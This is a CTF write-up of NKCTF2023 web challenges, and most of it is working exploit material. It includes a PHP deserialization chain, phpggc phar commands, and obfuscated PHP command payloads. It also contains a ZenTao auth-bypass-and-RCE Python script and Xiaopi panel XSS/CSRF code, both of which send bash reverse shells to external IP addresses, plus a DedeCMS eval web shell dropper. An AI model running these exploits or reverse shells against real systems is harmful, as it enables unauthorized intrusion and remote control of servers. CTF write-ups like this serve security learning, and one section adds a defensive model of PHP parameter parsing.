March 29, 2023

NKCTF2023 Web

How to put it, this competition was seriously polarized in difficulty....

WEB

baby_php | SOLVED | SOLVED - natro92

Use dir to find the file, then just open it with uniq (sort or more work too).

<?php
error_reporting(0);
class Welcome{
    public $name='welcome_to_NKCTF';
    public $arg = 'oww!man!!';

    // chain entry: echo on a Hell0 object calls its __toString
    public function __destruct(){
        if($this->name == 'welcome_to_NKCTF'){
            echo $this->arg;
        }
    }
}

function waf($string){
    if(preg_match('/f|l|a|g|\*|\?/i', $string)){
        die("you are bad");
    }
}
class Happy{
    public $shell='system';
    // shell bracket expressions spell the file name without any of the blocked letters
    public $cmd='cd ../../..;uniq [b-h]1[!0-9][b-z]';
    public function __invoke(){
        $shell = $this->shell;
        $cmd = $this->cmd;
        waf($cmd);
        eval($shell($cmd));
    }
}

class Hell0{
    public $func='Happy';
    // $this->func holds a Happy object, so $function() hits Happy::__invoke
    public function __toString(){
        $function = $this->func;
        $function();
    }
}
$happy = new Happy();
$hello = new Hell0();
$welcome = new Welcome();
$hello->func=$happy;
$welcome->arg = $hello;
echo(serialize($welcome));

?>

WebPagetest | SOLVED | SOLVED - Boogipop

Damn, what a pain this stupid target box was.
The hint said it was a WebPagetest 1-day; a search turned up AVD-2022-1474319.
Then the following commands were used repeatedly for RCE:

./phpggc Monolog/RCE2 system 'id' -p phar -o /tmp/testinfo.ini
# URL-encode the phar (the original put the comment right after the closing parenthesis, which made it part of the value)
URLENC_PAYLOAD=$(cat /tmp/testinfo.ini | xxd -p | tr -d "\n" | sed "s#..#%&#g")
# write the file
curl -sSkig 'http://43.152.206.162/runtest.php' -d 'rkey=gadget' -d "ini=$URLENC_PAYLOAD" -o -
# trigger the deserialization
curl -sSkig 'http://43.152.206.162/runtest.php' -d 'rkey=phar:///var/www/html/results/gadget./testinfo.ini/foo' -d "ini=$URLENC_PAYLOAD" -o -

The PHP version here must be below 8.2. The tool is phpggc, which generates deserialization gadget chains automatically and is open source on GitHub.
The vulnerability is an arbitrary file write in runtest.php, which can also be used to trigger phar deserialization.

Easyphp | SOLVED | SOLVED - Boogipop,natro92

Brain-dead web challenge.

POST /?a=QNKCDZO&b=240610708&e=114514.1&NS[CTF.go=1 HTTP/1.1
Host: c68827f5-b783-485a-a206-0550ca863a4d.node1.yuzhian.com.cn
Content-Length: 1291
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://c68827f5-b783-485a-a206-0550ca863a4d.node1.yuzhian.com.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://nkctf.yuzhian.com.cn:8000/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: _ga=GA1.1.704471072.1678693729; _ga_KCSGQQ51ER=GS1.1.1679669616.8.1.1679675571.0.0.0
Connection: close

c=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&d=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1&cmd=(~%8F%97%8F%96%91%99%90)(~);

The final cmd can be:

&cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);

The earlier parameters can be anything; cmd uses an XOR bypass. I got stuck on NS[CTF.go. The [ is used because:

In PHP, a period (.) cannot be used in a variable name. For example, $a.b is not a valid variable name, so PHP automatically replaces the dot with an underscore.
Besides the dot, some other characters appearing in a GET parameter name are also replaced with underscores automatically. The list of characters that get replaced:

chr(32) ( ) (space)

chr(46) (.) (dot)

chr(91) ([) (opening square bracket)

chr(128) - chr(159) (a range of characters)
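The bracket trick depends on how PHP normalises parameter names before the script, or a filter matching on raw query keys, ever sees them. The following Python model is added here and is not from the original post: it reproduces the space, dot and unmatched-bracket rules of PHP 7's variable registration (assumption: the chr(128)-chr(159) range quoted above is not modelled, and newer PHP versions may handle the unmatched bracket differently), so a filter can be compared against the key PHP actually stores.

```python
from urllib.parse import unquote_plus


def php_mangle_name(raw: str) -> str:
    """Model of how PHP derives a $_GET/$_POST key from a raw parameter name.

    Follows the PHP 7 logic in main/php_variables.c (assumption: only ' ', '.'
    and '[' are handled; the chr(128)-chr(159) range is deliberately left out):
      * leading spaces are skipped;
      * before the first '[', every ' ' and '.' becomes '_';
      * a '[' with a matching ']' is a real array index, reported as name[index]
        (nested indices are not modelled);
      * a '[' with no ']' anywhere becomes '_' and the rest is kept verbatim,
        which is why a '.' after it survives into the key.
    """
    name = raw.lstrip(" ")
    head, bracket, tail = name.partition("[")
    head = head.replace(" ", "_").replace(".", "_")
    if not bracket:
        return head
    if "]" in tail:
        index, _, _rest = tail.partition("]")
        return f"{head}[{index}]"
    return f"{head}_{tail}"


def php_parse_query(query: str) -> dict:
    """Split a raw query string on '&' and '=', URL-decode, then mangle names
    the way PHP does before populating $_GET."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        raw_name, _, raw_value = pair.partition("=")
        params[php_mangle_name(unquote_plus(raw_name))] = unquote_plus(raw_value)
    return params


if __name__ == "__main__":
    # constructed names: the first two collapse to the same key, the third keeps its dot
    for raw in ("NS.CTF.go", "NS_CTF.go", "NS[CTF.go"):
        print(f"{raw!r:14} -> PHP key {php_mangle_name(raw)!r}")
    # the challenge's own query string, minus the long c and d bodies
    print(php_parse_query("a=QNKCDZO&b=240610708&e=114514.1&NS[CTF.go=1"))
```

A filter that inspects the raw key NS[CTF.go never sees the NS_CTF.go that PHP stores; normalising with the same rules before matching closes that gap.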

Hardphp | SOLVED | SOLVED - Boogipop,sdegree

Brain-dead web challenge.

POST / HTTP/1.1
Host: 01c3bf35-e4f8-4d56-b247-f84fe01ad5da.node1.yuzhian.com.cn
Content-Length: 248
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36
Origin: http://01c3bf35-e4f8-4d56-b247-f84fe01ad5da.node1.yuzhian.com.cn
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://01c3bf35-e4f8-4d56-b247-f84fe01ad5da.node1.yuzhian.com.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: _ga=GA1.1.704471072.1678693729; _ga_KCSGQQ51ER=GS1.1.1679669616.8.1.1679679956.0.0.0
Connection: close

NKCTF=%24_%3D%28%28_%2F_%29._%29%5B_%5D%3B%24_%3D%2B%2B%24_%3B%24__%3D%24_.%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__.%3D%2B%2B%24_%3B%24__.%3D%2B%2B%24_%3B%24__%3D_.%24__%3B%24%24__%5B%ff%5D%28%24%24__%5B%fe%5D%29%3B&%ff=highlight_file&%fe=/flag

ezpms | SOLVED | SOLVED - Boogipop

Zentao 1-day: privilege bypass + arbitrary command execution

# -*- coding: UTF-8 -*-
# !/usr/bin/python

'''
Auth bypass + RCE PoC, pretty-URL (static rewrite) parameter version
ZenTao edition     affected versions                                      fixed version
Open source        unknown versions below 17.4 <= version <= 18.0.beta1    18.0.beta2
Ultimate           unknown versions below 3.4 <= version <= 4.0.beta1      4.0.beta2
Enterprise         unknown versions below 7.4 <= version <= 8.0.beta1      8.0.beta2
'''
import requests

proxies = {
    # "http": "127.0.0.1:8080",
    # "https": "127.0.0.1:8080",
}


def check(url):
    # url="http://10.211.55.3:8008"
    url = url.rstrip('/')  # normalise so every path below gets exactly one slash
    url1 = url + '/misc-captcha-user.html'
    # url1 = url+'/index.php?m=misc&f=captcha&sessionVar=user'  # non-pretty-URL deployments take parameters in this format
    # url2 = url+'/index.php?m=block&f=printBlock&id=1&module=my'  # URL that can be used to confirm the auth bypass
    url3 = url + '/repo-create.html'
    url4 = url + '/repo-edit-10000-10000.html'
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Cookie": "zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
    }

    headers2 = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Cookie": "zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": url + "/repo-edit-1-0.html"
    }

    data1 = 'product%5B%5D=1&SCM=Gitlab&name=66667&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid='
    data2 = 'SCM=Subversion&client=`bash -c "bash -i >%26 /dev/tcp/114.116.119.253/7788 <%261"`'
    s = requests.session()
    try:
        req1 = s.get(url1, proxies=proxies, timeout=5, verify=False, headers=headers)
        req3 = s.post(url3, data=data1, proxies=proxies, timeout=5, verify=False, headers=headers2)
        req4 = s.post(url4, data=data2, proxies=proxies, timeout=5, verify=False, headers=headers2)
        print(req4.text)
        if 'uid=' in req4.text:
            print(url, "")
            return True
    except Exception as e:
        print(e)
    return False


if __name__ == '__main__':
    print(check("http://ee12ada9-6792-4df7-b671-06316b719ff3.node1.yuzhian.com.cn/"))

ezcms | SOLVED | Working - Boogipop

Topic: DedeCMS 1-day backend getshell
DedeCMS 0day RCE - seizer-zyx - 博客园 (cnblogs)
First, the admin backend was found at /dede/login.php with admin/admin.
After logging into the admin panel, reproduce the steps from the article above.
The key points are where the shell file ends up being saved and where the file inclusion is triggered.

First, under Template Management, on the default template page, add a test template with the following content:

<?php "\x66\x69\x6c\x65\x5f\x70\x75\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73"('./shell.php', "<?php eva" . "l(\$_GE" . "T[a]);");

This is equivalent to putting a shell.php file in the current directory; what we need is a way to include this htm file.

Add a page under Single Page Document Management, as follows

This writes test.htm into 123.php, which is effectively a file inclusion, so our shell file gets created.
Next, visit

Then just execute commands at http://4e840ed5-6e1e-48fe-99f7-44ff988664bd.node2.yuzhian.com.cn/shell.php
Here the web root of the site is /

xiaopi | SOLVED | Working - Boogipop

Topic: the Xiaopi 1-day disclosed recently
The Xiaopi Linux management panel has both a front-end (unauthenticated) RCE and a back-end RCE. The back-end RCE is built on a 1-click XSS; the front-end RCE is 0-click, but this challenge has a bot, so the 1-click route was chosen.
First prepare exp.js, used to trigger the CSRF:

function poc(){
    $.get('/service/app/tasks.php?type=task_list',{},function(data){
        var id=data.data[0].ID;
        $.post('/service/app/tasks.php?type=exec_task',{
            tid:id
        },function(res2){
            $.post('/service/app/log.php?type=clearlog',{

            },function(res3){},"json");
        },"json");
    },"json");
}
function save(){
    var data=new Object();
    data.task_id="";
    data.title="test";
    data.exec_cycle="1";
    data.week="1";
    data.day="3";
    data.hour="14";
    data.minute = "20";
    data.shell='bash -c "bash -i >& /dev/tcp/175.24.235.176/7777 <&1"';
    $.post('/service/app/tasks.php?type=save_shell',data,function(res){
        poc();
    },'json');
}
save();

This writes the reverse shell command into the admin panel's scheduled tasks, which is how RCE is obtained.
A front-end bypass is also involved:
Adding the header X-Requested-With: XMLHttpRequest bypasses the authorization code check directly; the login page is reachable without knowing the authorization code.
Then put the XSS payload in the username field and start nc waiting for the reverse shell.
The payload goes in the username field, and the captcha must be correct, otherwise it fails.

About this Post

This post is written by Boogipop, licensed under CC BY-NC 4.0.

#WriteUp #CTF